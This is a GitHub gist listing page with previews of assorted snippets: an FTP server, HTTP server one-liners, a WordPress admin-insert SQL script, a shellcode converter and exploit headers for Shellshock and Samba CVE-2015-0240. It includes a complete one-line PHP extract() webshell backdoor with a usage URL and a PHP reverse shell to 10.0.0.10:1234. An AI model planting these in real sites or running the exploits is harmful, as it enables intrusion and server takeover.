Skip to content

Instantly share code, notes, and snippets.

View iamtutu's full-sized avatar

iamtutu iamtutu

36 followers · 113 following
View GitHub Profile
@scturtle
scturtle / ftpserver.py
Created June 20, 2011 16:03
simple ftp server by python
#!/usr/bin/env python2
# coding: utf-8
import os,socket,threading,time
#import traceback
allow_delete = False
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 8888
currdir=os.path.abspath('.')
@willurd
willurd / web-servers.md
Last active October 26, 2025 20:00
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@andresriancho
andresriancho / sparty_v_0.1.py
Created August 24, 2013 14:41
Sparty
#!/usr/bin/python
# Sparty - Sharepoint/Frontend Auditor
# By: Aditya K Sood - SecNiche Security Labs ! (c) 2013
license = """
Copyright (c) 2013, {Aditya K sood}
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
@azizur
azizur / create-wp-admin-account.sql
Last active September 28, 2021 15:39
Create a WordPress Administrator user account using SQL
USE __DATABASE__;
SET @username = 'azizur';
SET @password = MD5('password');
SET @fullname = 'Azizur Rahman';
SET @email = '[email protected]';
SET @url = 'http://azizur.com/';
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) VALUES (@username, @password, @fullname, @email, @url, NOW(), '0', @fullname);
@superkojiman
superkojiman / bin2sc.py
Created April 22, 2014 03:15
Convert bin to shellcode.
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s file.bin\n" % (sys.argv[0],)
sys.exit(0)
shellcode = "\""
ctr = 1
maxlen = 15
@leonjza
leonjza / backup.php
Last active August 18, 2020 15:10
PHP extract() Backdoor RCE | Sample usage: foo.bar/backup.php?ctime=system&atime=ls -lah
<?php extract($_REQUEST); @die($ctime($atime));
@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@claudijd
claudijd / exploit.py
Last active August 7, 2021 11:45
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
@honkskillet
honkskillet / byte-sizetuts.md
Last active August 22, 2024 14:19
A series of golang tutorials with youtube videos.
@worawit
worawit / cve-2015-0240_samba_exploit.py
Created April 10, 2015 14:48
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/